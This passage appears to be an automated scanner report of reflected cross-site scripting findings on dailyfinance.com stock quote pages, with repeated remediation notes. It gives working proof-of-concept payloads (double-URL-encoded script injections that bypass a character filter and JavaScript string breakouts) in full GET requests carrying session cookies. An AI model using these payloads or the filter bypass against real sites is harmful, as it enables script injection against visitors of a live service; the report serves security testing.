The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/evergreen-energy-inc-new/eeef6428%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22c1c1970b4/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa079'%3bc4bef405864 was submitted in the REST URL parameter 3. This input was echoed as fa079';c4bef405864 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/evergreen-energy-inc-new/eeefa079'%3bc4bef405864/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88bb9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d1584cb86f was submitted in the REST URL parameter 3. This input was echoed as 88bb9"><script>alert(1)</script>4d1584cb86f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/ftse-100/ukx88bb9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d1584cb86f/ise HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a74e'%3bec5d25dbfd4 was submitted in the REST URL parameter 3. This input was echoed as 4a74e';ec5d25dbfd4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/ftse-100/ukx4a74e'%3bec5d25dbfd4/ise HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24751'%3ba6e23bb58b5 was submitted in the REST URL parameter 3. This input was echoed as 24751';a6e23bb58b5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/gmx-resources-inc/gmxr24751'%3ba6e23bb58b5/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d11b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb9e9b53851d was submitted in the REST URL parameter 3. This input was echoed as d11b2"><script>alert(1)</script>b9e9b53851d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/gmx-resources-inc/gmxrd11b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb9e9b53851d/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e993b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaad299d9b26 was submitted in the REST URL parameter 3. This input was echoed as e993b"><script>alert(1)</script>aad299d9b26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/gold-futures-apr-2011-composite/e993b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaad299d9b26/cmx HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1b70'%3bf67d1ecf86a was submitted in the REST URL parameter 3. This input was echoed as b1b70';f67d1ecf86a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/gold-futures-apr-2011-composite/b1b70'%3bf67d1ecf86a/cmx HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd55e'%3bc3e98ec0ddd was submitted in the REST URL parameter 3. This input was echoed as fd55e';c3e98ec0ddd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/hang-seng-index/hsixfd55e'%3bc3e98ec0ddd/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29784%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8b45c640a2 was submitted in the REST URL parameter 3. This input was echoed as 29784"><script>alert(1)</script>a8b45c640a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/hang-seng-index/hsix29784%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8b45c640a2/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55344'%3b001ff1ae24f was submitted in the REST URL parameter 3. This input was echoed as 55344';001ff1ae24f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/henry-hub-natural-gas-futures-apr-2011-composite/55344'%3b001ff1ae24f/nym HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9f84%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead7d01a22cc was submitted in the REST URL parameter 3. This input was echoed as a9f84"><script>alert(1)</script>ad7d01a22cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/henry-hub-natural-gas-futures-apr-2011-composite/a9f84%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead7d01a22cc/nym HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2c36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97d1cfe87dc was submitted in the REST URL parameter 3. This input was echoed as c2c36"><script>alert(1)</script>97d1cfe87dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/k-v-pharmaceutical-company/kv.ac2c36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97d1cfe87dc/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f624'%3b2f6c02140e5 was submitted in the REST URL parameter 3. This input was echoed as 4f624';2f6c02140e5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/k-v-pharmaceutical-company/kv.a4f624'%3b2f6c02140e5/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cf05'%3b2c42d79a6ba was submitted in the REST URL parameter 3. This input was echoed as 6cf05';2c42d79a6ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/kv-pharmaceutical-co-cl-b/kv.b6cf05'%3b2c42d79a6ba/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab69f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11cb2168c6d was submitted in the REST URL parameter 3. This input was echoed as ab69f"><script>alert(1)</script>11cb2168c6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/kv-pharmaceutical-co-cl-b/kv.bab69f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11cb2168c6d/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c0ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec449bdccd8b was submitted in the REST URL parameter 3. This input was echoed as 2c0ef"><script>alert(1)</script>c449bdccd8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/las-vegas-sands-corp/lvs2c0ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec449bdccd8b/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a374'%3b7b4e9da9db2 was submitted in the REST URL parameter 3. This input was echoed as 8a374';7b4e9da9db2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/las-vegas-sands-corp/lvs8a374'%3b7b4e9da9db2/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a448'%3b4d2bab4fea9 was submitted in the REST URL parameter 3. This input was echoed as 8a448';4d2bab4fea9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/light-sweet-crude-oil-futures-mar-2011-composite/8a448'%3b4d2bab4fea9/nym HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec755e3ffde6 was submitted in the REST URL parameter 3. This input was echoed as 62a5d"><script>alert(1)</script>c755e3ffde6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/light-sweet-crude-oil-futures-mar-2011-composite/62a5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec755e3ffde6/nym HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54f7c'%3be9a331d34e1 was submitted in the REST URL parameter 3. This input was echoed as 54f7c';e9a331d34e1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
